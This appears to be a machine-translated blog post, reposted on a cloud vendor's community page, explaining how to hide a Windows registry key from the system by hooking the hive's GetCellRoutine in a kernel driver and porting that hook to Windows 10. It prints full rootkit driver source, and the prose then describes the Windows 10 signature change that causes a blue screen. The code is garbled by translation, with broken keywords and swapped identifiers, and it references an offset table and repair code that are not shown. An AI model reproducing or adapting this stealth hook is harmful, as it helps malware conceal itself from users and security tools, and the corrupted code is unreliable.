In Windows 10, how does one hide the registry?

Source: Internet
Author: User

In Windows 10, how does one hide the registry?

Using Hook HHIVE: GetCellRoutine () to hide the registry is a public method for a long time. Although some Anti Rootkit tools cannot be bypassed, this method is very stable to use, windows XP-Windows 8.1 can be well supported. In some environments, individuals prefer to use this method for registry hiding.

It has been several months since the official version of Windows 10 was released. Recently, some drivers have been written before to see the kernel changes of Windows 10 against Windows 8.1.

Today is the first article: porting Hook GetCellRoutine () to Windows 10. Other Windows 10 kernel articles will be shared later.

The original source cannot be found. This is the earliest code of this method:

# Include <ntddk. h> # define GET_PTR (ptr, offset) (* (PVOID *) (ULONG) ptr + (offset # Offset ))) # define CM_KEY_INDEX_ROOT 0x6972 // ir # define CM_KEY_INDEX_LEAF 0x696c/il # define 1_0x666c/fl # define 1_0x686c // hl // some CM data structures, only the first part used is listed # pragma pack (1) typedef struct _ CM_KEY_NODE {USHORT Signature; USHORT Flags; LARGE_INTEGER LastWriteTime; ULONG Spare; // used To be TitleIndex HANDLE Parent; ULONG SubKeyCounts [2]; // Stable and Volatile HANDLE SubKeyLists [2]; // Stable and Volatile //...} Struct, * PCM_KEY_NODE; typedef struct _ CM_KEY_INDEX {USHORT Signature; USHORT Count; HANDLE List [1];} CM_KEY_INDEX, * PCM_KEY_INDEX; typedef struct _ CM_KEY_BODY {ULONG Type; // "ky02" PVOID KeyControlBlock; PVOID policyblock; PEPROCESS Process process; // the owner Process LIST_ENTRY KeyBodyList; // key_nodes using the same kcb} CM_KEY_BODY, * PCM_KEY_BODY; typedef PVOID (_ stdcall * PGET_CELL_ROU TINE) (PVOID, HANDLE); typedef struct _ HHIVE {ULONG Signature; PGET_CELL_ROUTINE GetCellRoutine ;//...} HHIVE, * PHHIVE; # pragma pack () // The Name Of The primary key to be hidden WCHAR g_HideKeyName [] = L "; PGET_CELL_ROUTINE g_pGetCellRoutine = NULL; then * g_ppGetCellRoutine = NULL; PCM_KEY_NODE g_HideNode = NULL; PCM_KEY_NODE g_LastNode = NULL; // open the Key HANDLE OpenKeyByName (PCWSTR success) {NTSTATUS status; UNICODE_STRING uKeyName; OBJECT_ATTRIBUTES oa; HANDLE hKey; rtlInitUnicodeString (& uKeyName, pwcsKey Name); InitializeObjectAttributes (& oa, & uKeyName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL); status = ZwOpenKey (& hKey, KEY_READ, & oa); if (! NT_SUCCESS (status) {dbuplint ("ZwOpenKey Failed: % lx \ n", status); return NULL;} return hKey ;} // obtain the KeyControlBlock PVOID GetKeyControlBlock (HANDLE hKey) {NTSTATUS status; PCM_KEY_BODY KeyBody; pvoid kcb; if (hKey = NULL) return NULL; // get the Object Body status = ObReferenceObjectByHandle (hKey, KEY_READ, NULL, KernelMode, & KeyBody, NULL) by the Key handle; if (! NT_SUCCESS (status) {dbuplint ("ObReferenceObjectByHandle Failed: % lx \ n", status); return NULL;} // The object body contains KeyControlBlock KCB = KeyBody-> KeyControlBlock; dbuplint ("KeyControlBlock = % lx \ n", KCB); ObDereferenceObject (KeyBody); return KCB ;} // obtain the PVOID GetLastKeyNode (PVOID Hive, PCM_KEY_NODE Node) of the last subkey of the parent key {// obtain the parent key Node PCM_KEY_NODE ParentNode = (PCM_KEY_NODE) g_pGetCellRoutine (Hive, node-> Parent); // obtain the Index PCM_KEY_INDEX = (PCM_KEY_INDEX) g_pGetCellRoutine (Hive, ParentNode-> SubKeyLists [0]) of the subkey. dbuplint ("ParentNode = % lx \ nIndex = % lx \ n", ParentNode, Index); // if it is a root (secondary) Index, obtain the last Index if (Index-> Signature = CM_KEY_INDEX_ROOT) {Index = (PCM_KEY_INDEX) g_pGetCellRoutine (Hive, Index-> List [Index-> Count-1]); dbuplint ("Index = % lx \ n", Index);} if (Index-> Signature = CM_KEY_FAST_LEAF | Index-> Signature = CM_KEY_HASH_LEAF) {// fast leaf index (2 k) or hash leaf index (XP/2k3), return the final node return g_pGetCellRoutine (Hive, index-> List [2 * (Index-> Count-1)]);} else {// general leaf Index, return the last node return g_pGetCellRoutine (Hive, index-> List [Index-> Count-1]) ;}// hook function of the GetCell routine PVOID MyGetCellRoutine (PVOID Hive, HANDLE Cell) {// call the original function PVOID pRet = g_pGetCellRoutine (Hive, Cell); if (pRet) {// return the node to be hidden if (pRet = g_HideNode) {dbuplint ("GetCellRoutine (% lx, % 08lx) = % lx \ n", Hive, Cell, pRet ); // query, save, and return the node pRet = g_LastNode = (PCM_KEY_NODE) GetLastKeyNode (Hive, g_HideNode) of the last subkey of the parent key ); dbuplint ("g_LastNode = % lx \ n", g_LastNode); // The Last node is hidden. if (pRet = g_HideNode) pRet = NULL is returned ;} // The returned result is the last previously saved node else if (pRet = g_LastNode) {dbuplint ("GetCellRoutine (% lx, % 08lx) = % lx \ n", Hive, cell, pRet); // clear the Save value and return the NULL value pRet = g_LastNode = NULL;} return pRet;} NTSTATUS DriverUnload (PDRIVER_OBJECT pDrvObj) {dbuplint ("DriverUnload () \ n "); // remove the hook if (delimiter) * delimiter = delimiter; return STATUS_SUCCESS;} NTSTATUS DriverEntry (PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath) {ULONG BuildNumber; ULONG KeyHiveOffset; // KeyControlBlock-> KeyHive ULONG KeyCellOffset; // KeyControlBlock-> KeyCell HANDLE hKey; pvoid kcb, Hive; dbuplint ("DriverEntry () \ n "); pDrvObj-> DriverUnload = DriverUnload; // query BuildNumber if (PsGetVersion (NULL, NULL, & BuildNumber, NULL) return STATUS_NOT_SUPPORTED; dbuplint ("BuildNumber = % d \ n ", buildNumber); // The KeyControlBlock structure versions are slightly different. // The Cell value is generally smaller than 0x80000000, while the Hive is the opposite. In this way, you can determine whether to switch (BuildNumber) {case 2195: // Win2000 KeyHiveOffset = 0xc; KeyCellOffset = 0x10; break; case 2600: // WinXP case 3790: // Win2003 KeyHiveOffset = 0x10; KeyCellOffset = 0x14; break; default: return STATUS_NOT_SUPPORTED;} // open the hKey to be hidden = OpenKeyByName (g_HideKeyName); // obtain the key's KeyControlBlock KCB = GetKeyControlBlock (hKey); if (KCB) {// obtain Hive PHHIVE Hive = (PHHIVE) GET_PTR (KCB, KeyHive) from KCB; // GetCellRoutine in KCB, save the original address g_ppGetCellRoutine = & Hive-> GetCellRoutine; g_pGetCellRoutine = Hive-> GetCellRoutine; dbuplint ("GetCellRoutine = % lx \ n", callback); // obtain the node to be hidden and save g_HideNode = (PCM_KEY_NODE) g_pGetCellRoutine (Hive, GET_PTR (KCB, KeyCell); // hook GetCell routine Hive-> GetCellRoutine = MyGetCellRoutine;} ZwClose (hKey); return STATUS_SUCCESS ;}

(For basic and fundamental things, Baidu. I am going to answer the question here .)

KeyHive & KeyCell

The offset of CM_KEY_CONTROL_BLOCK: KeyHive and CM_KEY_CONTROL_BLOCK: KeyCell does not change in Windows 10, which is the same as that in Windows 7/8. The 64-bit system is also the same.

 

Is an offset table from Windows XP-Windows 10.

 

Other structures CM_KEY_BODY, CM_KEY_NODE, and CM_KEY_INDEX are not changed and can be used directly.

 

GetCellRoutine () Changes

If the offset and structure are not changed, compile and run the program directly. The result is naturally a blue screen, otherwise this article will not be available. By analyzing memory dump, we found that the Hook was successful, but when the custom GetCellRoutine () function was executed, the blue screen was caused by the unbalanced stack.

 

Since the Hook is okay, it turns out that the GetCellRoutine () itself has changed. Restart the VM and check which processing function the original GetCellRoutine () points.

 

The processing function is HvpGetCellPaged (). Check the code in IDA.

 

IDA identified three parameters. The blue screen problem originally exists here. Windows 10 has one parameter more than Windows 7/8. F5: Let's see what this parameter is.

 

The 3rd parameter is an out dwrod *, which is only used for return and does not need to be input. This makes it much easier. If it is compatible, it should not be blue screen.

Blue screen repair

 

 

After compilation and running, you can hide it. (This method can also be used 64-bit .)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.